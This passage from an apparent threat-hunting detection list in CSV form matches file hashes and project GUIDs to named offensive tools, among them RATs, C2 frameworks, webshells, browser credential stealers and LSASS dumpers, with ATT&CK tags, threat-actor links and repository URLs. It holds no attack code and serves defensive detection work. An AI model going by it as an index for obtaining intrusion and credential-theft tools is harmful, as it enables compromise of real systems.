Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","22876" "*1e1e309cc05c6438400f8632b2ac6c375e9d96ebb3b7a2373ff341e4a91fe11e*",".{0,1000}1e1e309cc05c6438400f8632b2ac6c375e9d96ebb3b7a2373ff341e4a91fe11e.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","22877" "*1e1f0cff-ff7a-406d-bd82-e53809a5e93a*",".{0,1000}1e1f0cff\-ff7a\-406d\-bd82\-e53809a5e93a.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","The GUID of the VSTO's security public key","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","22878" "*1e2136c0b4bef6f7a9de7cd1d57d2c5f3dae7f90116b50454db495970d0fe251*",".{0,1000}1e2136c0b4bef6f7a9de7cd1d57d2c5f3dae7f90116b50454db495970d0fe251.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","#filehash","network exploitation 
tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","22879" "*1e2744c89803f6afc884b214ba4a8f47dfc1725a4180d767630205feeead064b*",".{0,1000}1e2744c89803f6afc884b214ba4a8f47dfc1725a4180d767630205feeead064b.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","#filehash","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","22880" "*1E2A1E78-ED0B-414B-A956-86232B1025BE*",".{0,1000}1E2A1E78\-ED0B\-414B\-A956\-86232B1025BE.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","22881" "*1e2a2f0524221d5e07dd7a11d64cd1c1af7137d3cc022ef550a9aff5bcfec0cb*",".{0,1000}1e2a2f0524221d5e07dd7a11d64cd1c1af7137d3cc022ef550a9aff5bcfec0cb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22882" 
"*1e3ec12fbe9825c1eb044994d27c6fb97e5b2cee352d114b0ae6f8862e2a2dd5*",".{0,1000}1e3ec12fbe9825c1eb044994d27c6fb97e5b2cee352d114b0ae6f8862e2a2dd5.{0,1000}","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22883" "*1e438cfed2d0cacdbf15d96360484541339463564d29c883afe513222df61b32*",".{0,1000}1e438cfed2d0cacdbf15d96360484541339463564d29c883afe513222df61b32.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","22885" "*1e47114546cda37a3ab03867aca5b78bb1ccaf41356e39d572a3ef398114d361*",".{0,1000}1e47114546cda37a3ab03867aca5b78bb1ccaf41356e39d572a3ef398114d361.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22886" "*1E474090-96A7-433C-BFE6-0F8B45DECC42*",".{0,1000}1E474090\-96A7\-433C\-BFE6\-0F8B45DECC42.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - 
T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#GUIDproject","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","22887" "*1e47ba612581f13591bdf9b76bf654b38d6f5bfe5d45846285dea5ebd3b22c26*",".{0,1000}1e47ba612581f13591bdf9b76bf654b38d6f5bfe5d45846285dea5ebd3b22c26.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22888" "*1e4ff3139bfa4a040ce59f0efd10cca01d0c7da4e56c306b42f5e485b1a663e9*",".{0,1000}1e4ff3139bfa4a040ce59f0efd10cca01d0c7da4e56c306b42f5e485b1a663e9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22889" "*1e522857a95073072b70cbec8abcf0c0a3b4603390355fc077fac998273e017e*",".{0,1000}1e522857a95073072b70cbec8abcf0c0a3b4603390355fc077fac998273e017e.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","22890" 
"*1e53b8773c0796d3bed82c67ced0fa96ec2565a697035826a8cec638c6454c7b*",".{0,1000}1e53b8773c0796d3bed82c67ced0fa96ec2565a697035826a8cec638c6454c7b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22891" "*1e5feda37def8d6575efcd1ba2c545dd0355f1810b4a7a6051bdd9d3701fdb95*",".{0,1000}1e5feda37def8d6575efcd1ba2c545dd0355f1810b4a7a6051bdd9d3701fdb95.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22895" "*1e64a9795e35454189e28fdf181ba87960381f3d547a883048d84a119c4b92e0*",".{0,1000}1e64a9795e35454189e28fdf181ba87960381f3d547a883048d84a119c4b92e0.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22896" 
"*1e661c6d9386dfb181a8c538c3f0b6c5531f9986ad0564eee847ac917430403a*",".{0,1000}1e661c6d9386dfb181a8c538c3f0b6c5531f9986ad0564eee847ac917430403a.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","22898" "*1e6f328bb3ca446969f0cf086b873081a5345b49fbb5f0bac9f7e5077cd74f76*",".{0,1000}1e6f328bb3ca446969f0cf086b873081a5345b49fbb5f0bac9f7e5077cd74f76.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#filehash","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","22900" "*1E70D62D-CC36-480F-82BB-E9593A759AF9*",".{0,1000}1E70D62D\-CC36\-480F\-82BB\-E9593A759AF9.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","0","#GUIDproject","N/A","7","3","286","47","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z","22902" "*1e7a48d3a266ff3a1521da0804858af56093f9c736c06be2bc6b46502a776d5d*",".{0,1000}1e7a48d3a266ff3a1521da0804858af56093f9c736c06be2bc6b46502a776d5d.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#filehash","N/A","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","22903" "*1e7fb9e5dffcf6d3294e99417419221cebf322b760d854c978d9fcdf2994584b*",".{0,1000}1e7fb9e5dffcf6d3294e99417419221cebf322b760d854c978d9fcdf2994584b.{0,1000}","offensive_tool_keyword","C3","Framework 
designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","22904" "*1e82c733ecbf30e06bfa200e327fad167e79a55854a198f92afa2fa7d0f9337f*",".{0,1000}1e82c733ecbf30e06bfa200e327fad167e79a55854a198f92afa2fa7d0f9337f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22905" "*1e83e7eb564b39cd4d600a3b9a906a2b59bbae26320b15b5065638ad267cc3cb*",".{0,1000}1e83e7eb564b39cd4d600a3b9a906a2b59bbae26320b15b5065638ad267cc3cb.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","#filehash","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","22907" "*1e86687255a3e8b507716d855768ae9e6064152106c041a6aa4940bcafc81079*",".{0,1000}1e86687255a3e8b507716d855768ae9e6064152106c041a6aa4940bcafc81079.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","22908" 
"*1e895d59aad4217f8c65ac581d28233b0f4415629d28a37aebf0743d07174848*",".{0,1000}1e895d59aad4217f8c65ac581d28233b0f4415629d28a37aebf0743d07174848.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22909" "*1e8a611cf3a7ef7c4450f7d514fa940ae996df29c2ddfc2a8195f53834c14d05*",".{0,1000}1e8a611cf3a7ef7c4450f7d514fa940ae996df29c2ddfc2a8195f53834c14d05.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22910" "*1e8efe80176f832df2a27862795208571fae916c29e755447305178528bcd437*",".{0,1000}1e8efe80176f832df2a27862795208571fae916c29e755447305178528bcd437.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - 
Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22913" "*1e8efe80176f832df2a27862795208571fae916c29e755447305178528bcd437*",".{0,1000}1e8efe80176f832df2a27862795208571fae916c29e755447305178528bcd437.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22914" "*1e8fc1ed166a78bcb9075d3cd122af35d3bcca902a842bde00a0c6d515820cfa*",".{0,1000}1e8fc1ed166a78bcb9075d3cd122af35d3bcca902a842bde00a0c6d515820cfa.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation 
tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","22915" "*1e944ac6fd16e486ddf69e61510c37b8df113ace0e346223e8d6394c544b32bf*",".{0,1000}1e944ac6fd16e486ddf69e61510c37b8df113ace0e346223e8d6394c544b32bf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22918" "*1ea5b4bca8da1cbc3fe7cc396531423ead927ea709c9b5d5de20c931590c6a25*",".{0,1000}1ea5b4bca8da1cbc3fe7cc396531423ead927ea709c9b5d5de20c931590c6a25.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","22922" "*1ea81f89cfaaf2fe3273f042bb4eaafc1046fbc3ceb146b79eee8a898a189b45*",".{0,1000}1ea81f89cfaaf2fe3273f042bb4eaafc1046fbc3ceb146b79eee8a898a189b45.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - 
TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","22923" "*1eb4e2cd15083c230408677777e1ddb5e31d04ae4b8c2cfdda52dd0e8438aa4d*",".{0,1000}1eb4e2cd15083c230408677777e1ddb5e31d04ae4b8c2cfdda52dd0e8438aa4d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22925" "*1eb987e0-23a5-415e-9194-cd961314441b*",".{0,1000}1eb987e0\-23a5\-415e\-9194\-cd961314441b.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#GUIDproject","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","22926" "*1ebee3f2cc0a98db23a6bf0af4e5dd14bd8d21a4de9cbba58d43521b0bbe1294*",".{0,1000}1ebee3f2cc0a98db23a6bf0af4e5dd14bd8d21a4de9cbba58d43521b0bbe1294.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","#filehash","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","22927" "*1ec6f023ad651375efd66ae2a21f7609ed29b9fdfe725304bbaf219f5876350d*",".{0,1000}1ec6f023ad651375efd66ae2a21f7609ed29b9fdfe725304bbaf219f5876350d.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","22929" "*1ec72a3db270fd02e4a94d1bcf92bcf75637d0563d38ca63f296a04c62becec8*",".{0,1000}1ec72a3db270fd02e4a94d1bcf92bcf75637d0563d38ca63f296a04c62becec8.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22930" "*1ec9f1961250dc8bd691d8c30c29cf96601fd0244cfa385e7f7f8e4bc0886b02*",".{0,1000}1ec9f1961250dc8bd691d8c30c29cf96601fd0244cfa385e7f7f8e4bc0886b02.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22931" "*1eca6224c1b88fb220bbfa728cf27f260fb1ea27d5520167fd98ca25b0e5c1c8*",".{0,1000}1eca6224c1b88fb220bbfa728cf27f260fb1ea27d5520167fd98ca25b0e5c1c8.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","22932" "*1ecac46b693f7ac81d6ac3198742d5b7729391f2ddc5c908f4a665c92c7dec7d*",".{0,1000}1ecac46b693f7ac81d6ac3198742d5b7729391f2ddc5c908f4a665c92c7dec7d.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","22933" "*1ecb2406b796017446aa92b071d1f26f7fbf2a1a9c61f6b393437500518ec193*",".{0,1000}1ecb2406b796017446aa92b071d1f26f7fbf2a1a9c61f6b393437500518ec193.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","#filehash","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","22934" "*1ecc20b0a11a89389b677aceccc9a47b518aaf088c5d6cac63302b27ad12b364*",".{0,1000}1ecc20b0a11a89389b677aceccc9a47b518aaf088c5d6cac63302b27ad12b364.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22935" "*1ecf18a303bf9af2e5fc0f2cda9777bf9a759a88614edc0eb416ac4517fa3746*",".{0,1000}1ecf18a303bf9af2e5fc0f2cda9777bf9a759a88614edc0eb416ac4517fa3746.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22936" 
"*1ed3cce97e2fead6c5f784b3df60d104db026c106a049e9b9a613e7407822c1a*",".{0,1000}1ed3cce97e2fead6c5f784b3df60d104db026c106a049e9b9a613e7407822c1a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22938" "*1ee8207a97428b801b4587c40011193816bd114849e1ddfccc3a313260c20c0c*",".{0,1000}1ee8207a97428b801b4587c40011193816bd114849e1ddfccc3a313260c20c0c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22942" "*1ee8a433f650466547e5003bcf470eb70cfcaee27cbebae2f55adbcbacd6bf40*",".{0,1000}1ee8a433f650466547e5003bcf470eb70cfcaee27cbebae2f55adbcbacd6bf40.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 